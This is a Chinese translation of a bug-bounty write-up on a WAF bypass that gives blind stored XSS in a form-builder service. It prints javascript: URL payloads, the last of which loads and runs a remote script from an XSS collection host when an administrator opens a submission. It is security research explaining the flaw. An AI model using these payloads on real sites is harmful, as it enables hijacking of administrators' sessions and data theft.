原文：Hack Your Form – New vector for Blind XSS

漏洞：绕过waf造成XSS

作者：GeneralEG

难度：低

各位大佬们好，今天我要分享一个有趣的漏洞发现，关于如何绕过waf来执行javascript代码并且实现盲注存储型XSS。我在很多站点中都发现了这个问题，所以我决定以其中一个为例来讲解；

我们暂时假设该域名为redacted.com，经过一些调查我发现该站点提供一个特定的服务（创建表格）。

该服务是如何工作的呢？

1）用户创建表单

2）用户与访问者共享链接

3）访问者填写表格

4）填写的信息将提交到 redacted.com/manager/{Form ID}/

表格创建好之后，我们使用访问者打开表格；

第一次实验时，我尝试用最原始的方法绕过它（website.com?”payload）我的payload是 https://example.com/?"%22"

然后用表单创建者打开看看发生了什么，很不幸的是过滤器编码了双引号，我们输入的数据变成了https://example.com/?"%22“

注意（标签）中呈现的链接

接着我尝试采用Fuzzing测试，当尝试 test:https://example.com时过滤器接受了这种输入

然后又开始尝试javascript:https://evil.com 同样的过滤器也没有过滤，现在我已经很确定这里存在XSS，但它需要真正的网站与我的payload结合使用才有效

所以我重新构造的payload是

1

javascript:x='http://x.c';alert('xss');//

最后的最后，我们想要制作一个Blind XSS来攻击真正的管理员，所以最终的payload是

1

javascript:eval('window.s=document.createElement(\'script\');window.s.src=\'//xsspt.com/SLEPOE\';document.body.appendChild(window.s)');s='https://s.com'